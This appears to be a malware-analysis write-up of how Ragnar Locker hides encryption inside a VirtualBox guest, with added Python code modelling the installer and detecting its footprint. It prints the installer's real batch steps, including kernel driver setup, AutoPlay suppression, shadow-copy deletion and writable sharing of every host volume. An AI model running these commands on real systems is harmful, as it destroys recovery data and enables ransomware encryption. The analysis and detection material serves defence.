A ransomware strain called "Ragnar Locker" has recently been seen infecting machines in an unusual way. Instead of running its encryption payload directly on the host, it installs a VirtualBox virtual machine with a stripped-down Windows XP inside, maps the host's drives into the guest as shared folders, and encrypts them from within the virtual machine. The host's antivirus only sees a legitimate VirtualBox process reading and writing files, not the ransomware executable, so the encryption goes undetected.
The attackers use a strategy called "Living off the Land", meaning that legitimate administration tools and features already present on the network are used to deploy the malware. In this case a Group Policy Object was used to download and install an MSI package containing a copy of VirtualBox, a Windows XP disk image, and the Ragnar Locker executable inside that image. Pushing software through a GPO requires domain-level administrative rights, so by the time the ransomware ran the attackers already controlled the domain.
VirtualBox's shared folders feature (provided by the Guest Additions installed in the guest) lets directories on the host be exposed to the guest. The installer uses it to share every local disk, removable drive and mapped network drive on the host with the virtual machine. Once those shares are mapped inside the guest, the ransomware can encrypt any file on them; the host's antivirus sees only the VirtualBox process touching the files, not the ransomware binary, so it is not detected.
Here is how the virtual machine is installed on the host machine.
The VirtualBox software is copied to C:\Program Files (x86)\VirtualAppliances
The MSI file also deploys an executable, va.exe, a batch file, install.bat, and a few support files. Once installation finishes, va.exe runs, which in turn runs the batch script. The script registers the VirtualBox libraries VBoxC.dll and VBoxRT.dll and installs the VirtualBox kernel driver VboxDrv.sys as an auto-start kernel service, then starts it:
regsvr32 /S "%binpath%\VboxC.dll"
sc create VBoxDRV binpath= "%binpath%\drivers\VboxDrv.sys" type= kernel start= auto error= normal displayname= PortableVBoxDRV
sc start VBoxDRV
The script then stops the Shell Hardware Detection service. This disables Windows AutoPlay, so no pop-up appears when the script mounts volumes and the virtual machine attaches to them in the following steps:
sc stop ShellHWDetection
Next it deletes the machine's volume shadow copies, so that earlier, unencrypted versions of files cannot be restored from them:
vssadmin delete shadows /all /quiet
The install.bat script then makes every volume on the physical machine reachable from the guest. It uses mountvol to list all volume GUIDs, assigns each one the first unused drive letter from C to Z (the check does not skip volumes that already have a letter, so those end up with a second one), and pauses about a second after each mount using ping. It then walks C to Z again and, for every letter that now exists, appends a writable SharedFolder entry to sf.txt, in the format VirtualBox uses in its machine configuration file. The !freedrive! and !driveid! syntax relies on delayed variable expansion having been enabled earlier in the script.
mountvol | find "}\" > v.txt
(For /F %%i In (v.txt) Do (
    Set freedrive=0
    FOR %%d IN (C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
        IF NOT EXIST %%d:\ (
            IF "!freedrive!"=="0" (
                Set freedrive=%%d
            )
        )
    )
    mountvol !freedrive!: %%i
    ping -n 2 127.0.0.1
))
Set driveid=0
FOR %%d IN (C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
    IF EXIST %%d:\ (
        Set /a driveid+=1
        echo ^<SharedFolder name="!driveid!" hostPath="%%d:\" writable="true"/^> >>sf.txt
    )
)
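To make the batch logic above easier to follow, here is an added Python model of the same enumeration. It is not code from the installer or from the original write-up: it parses constructed mountvol output, gives every listed volume the first free drive letter exactly as the first loop does, and emits the SharedFolder lines the second loop writes to sf.txt. The volume GUIDs and drive letters in the sample are made up.

```python
"""Python model of the install.bat drive-enumeration step (added example).

Reproduces the batch excerpt's logic: every volume GUID reported by mountvol
is given the first free drive letter (C..Z), and every letter then in use
becomes a writable VirtualBox SharedFolder entry. SAMPLE_MOUNTVOL is a
constructed sample; the GUIDs are not real.
"""
import re
import string

# Constructed mountvol output: two lettered volumes and one without a
# mount point (a recovery partition, say).
SAMPLE_MOUNTVOL = """\
Possible values for VolumeName along with current mount points are:

    \\\\?\\Volume{11111111-0000-0000-0000-000000000001}\\
        C:\\

    \\\\?\\Volume{11111111-0000-0000-0000-000000000002}\\
        *** NO MOUNT POINTS ***

    \\\\?\\Volume{11111111-0000-0000-0000-000000000003}\\
        E:\\
"""

LETTERS = list(string.ascii_uppercase[2:])  # C..Z, as in the batch FOR loops
VOLUME_RE = re.compile(r"\\\\\?\\Volume\{[0-9A-Fa-f-]+\}\\")
LETTER_RE = re.compile(r"^\s+([A-Z]):\\$", re.MULTILINE)


def parse_mountvol(text):
    """Return (volume_guids, letters_in_use).

    `find "}\"` in the batch keeps exactly the volume GUID lines; the
    indented "X:\" lines tell us which letters are already taken."""
    return VOLUME_RE.findall(text), set(LETTER_RE.findall(text))


def assign_letters(volumes, in_use):
    """First FOR loop: each volume gets the first free letter, even if it
    already has one (the script never checks). Returns the mounts made
    and the final set of letters in use."""
    in_use = set(in_use)
    mounts = []
    for vol in volumes:
        free = next((d for d in LETTERS if d not in in_use), None)
        if free is None:
            break  # the batch would run "mountvol 0: ..." and fail here
        in_use.add(free)
        mounts.append((free, vol))
    return mounts, in_use


def shared_folder_xml(in_use):
    """Second FOR loop: one writable SharedFolder per existing letter C..Z,
    numbered in letter order just as driveid is incremented."""
    letters = sorted((d for d in in_use if d in LETTERS), key=LETTERS.index)
    return [f'<SharedFolder name="{n}" hostPath="{d}:\\" writable="true"/>'
            for n, d in enumerate(letters, start=1)]


def build_shares(mountvol_text):
    """Run the whole step: returns (mounts, sf.txt lines)."""
    volumes, in_use = parse_mountvol(mountvol_text)
    mounts, in_use = assign_letters(volumes, in_use)
    return mounts, shared_folder_xml(in_use)


if __name__ == "__main__":
    mounts, sf_lines = build_shares(SAMPLE_MOUNTVOL)
    for letter, vol in mounts:
        print(f"mountvol {letter}: {vol}")
    print("\n".join(sf_lines))
```

Running it on the sample shows the side effect worth remembering: the three volumes are mounted at D:, F: and G: even though two of them were already C: and E:, and sf.txt ends up with five SharedFolder entries, one per letter, each exposing a whole host volume writable to the guest.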
Then, the virtual machine is started with this command:
"%binpath%\VboxHeadless.exe" --startvm micro -v off
The Windows XP virtual machine itself is stored in a disk image called micro.vdi, and the ransomware executable sits inside the guest at C:\vrun.exe. It is launched by a batch file, vrun.bat, placed in the guest's C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\ folder, so it runs automatically when the virtual machine boots. vrun.bat first maps the shared folders exported by the host to drive letters inside the guest, which gives the ransomware full read and write access to the host's local disks, removable media and network drives.
vrun.exe then runs, encrypts the files on those drives, and finally displays the ransom note shown below:
Because the installer was pushed out through a Group Policy Object, the attackers already controlled the domain before the ransomware ran. Generic hygiene (being careful with email attachments and links from unknown or suspicious senders, only downloading software from official, trustworthy sites, and keeping machines patched) is still worth doing, but would not by itself have stopped this stage. Every step of the install script leaves a host-side trace that can be alerted on: sc create with type= kernel for a new driver service, sc stop ShellHWDetection, vssadmin delete shadows /all /quiet, a regsvr32 of VBoxC.dll, and VBoxHeadless.exe starting a VM from a directory that is not a normal VirtualBox installation. Unexpected GPO changes and MSI packages downloaded and installed through a GPO deserve the same attention. Finally, keep offline backups of important data, since the shadow copies are deleted before encryption begins and an attacker with domain control can reach any online backup.
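The install sequence described above, from the DLL registration through starting the VM, shows up on the host as a short series of process launches. As an added example (not from the original write-up or any vendor product), the Python script below runs simple detection rules over constructed process-creation records of the kind a Sysmon Event ID 1 or Windows Security 4688 parser would produce, and flags any host on which several of them fire. The log records, host names, the "normal" VirtualBox install directory, and the expansion of %binpath% to the install directory named earlier are all assumptions made for the example.

```python
"""Detection rules for the host-side footprint of the installer (added example).

Not code from the original write-up or any vendor tool. SAMPLE_EVENTS are
constructed process-creation records (image path plus command line); the
host names, paths and the "normal" VirtualBox directory are assumptions.
"""
import re
from collections import defaultdict

# Where a legitimately installed VirtualBox normally lives (assumed).
KNOWN_VBOX_DIRS = {r"c:\program files\oracle\virtualbox"}

# Each rule is matched against the command line, case-insensitively.
RULES = [
    ("kernel driver service created with sc",
     re.compile(r"\bsc(\.exe)?\s+create\b.*\btype=\s*kernel\b", re.I)),
    ("ShellHWDetection stopped (AutoPlay suppression)",
     re.compile(r"\bsc(\.exe)?\s+stop\s+shellhwdetection\b", re.I)),
    ("volume shadow copies deleted",
     re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I)),
    ("VirtualBox COM library registered with regsvr32",
     re.compile(r"\bregsvr32(\.exe)?\b.*vboxc\.dll", re.I)),
    ("headless VM started",
     re.compile(r"vboxheadless(\.exe)?\b.*--startvm\b", re.I)),
]
OUTSIDE_DIR_RULE = "VirtualBox binary run from outside its normal install directory"

# Constructed events. HOST-A is an ordinary admin who uses VirtualBox;
# HOST-B shows the install.bat sequence with %binpath% expanded (assumed).
BINPATH = r"C:\Program Files (x86)\VirtualAppliances"
SAMPLE_EVENTS = [
    {"host": "HOST-A", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin list shadows"},
    {"host": "HOST-A", "image": r"C:\Program Files\Oracle\VirtualBox\VBoxHeadless.exe",
     "cmdline": r'"C:\Program Files\Oracle\VirtualBox\VBoxHeadless.exe" --startvm devbox'},
    {"host": "HOST-B", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": f'regsvr32 /S "{BINPATH}\\VboxC.dll"'},
    {"host": "HOST-B", "image": r"C:\Windows\System32\sc.exe",
     "cmdline": f'sc create VBoxDRV binpath= "{BINPATH}\\drivers\\VboxDrv.sys" '
                "type= kernel start= auto error= normal displayname= PortableVBoxDRV"},
    {"host": "HOST-B", "image": r"C:\Windows\System32\sc.exe",
     "cmdline": "sc stop ShellHWDetection"},
    {"host": "HOST-B", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin delete shadows /all /quiet"},
    {"host": "HOST-B", "image": f"{BINPATH}\\VboxHeadless.exe",
     "cmdline": f'"{BINPATH}\\VboxHeadless.exe" --startvm micro -v off'},
]


def vbox_outside_known_dir(image):
    """True for any VBox*.exe launched from a directory not in KNOWN_VBOX_DIRS."""
    directory, _, name = image.lower().rpartition("\\")
    return name.startswith("vbox") and directory not in KNOWN_VBOX_DIRS


def matched_rules(event):
    """Names of every rule that fires on a single event."""
    hits = [name for name, rx in RULES if rx.search(event["cmdline"])]
    if vbox_outside_known_dir(event["image"]):
        hits.append(OUTSIDE_DIR_RULE)
    return hits


def hunt(events, threshold=3):
    """Hosts on which at least `threshold` distinct rules fired.

    One rule alone (an admin stopping a service, a developer starting a
    VM) is noise; the combination is the pattern from the write-up."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]].update(matched_rules(ev))
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= threshold}


if __name__ == "__main__":
    for host, rules in hunt(SAMPLE_EVENTS).items():
        print(host)
        for rule in rules:
            print("  -", rule)
```

On the sample, HOST-A trips only the "headless VM started" rule and stays below the threshold, while HOST-B trips all six. In production the same rules would key on the real Sysmon or 4688 fields and add a time window, since the whole sequence runs within minutes of the MSI landing.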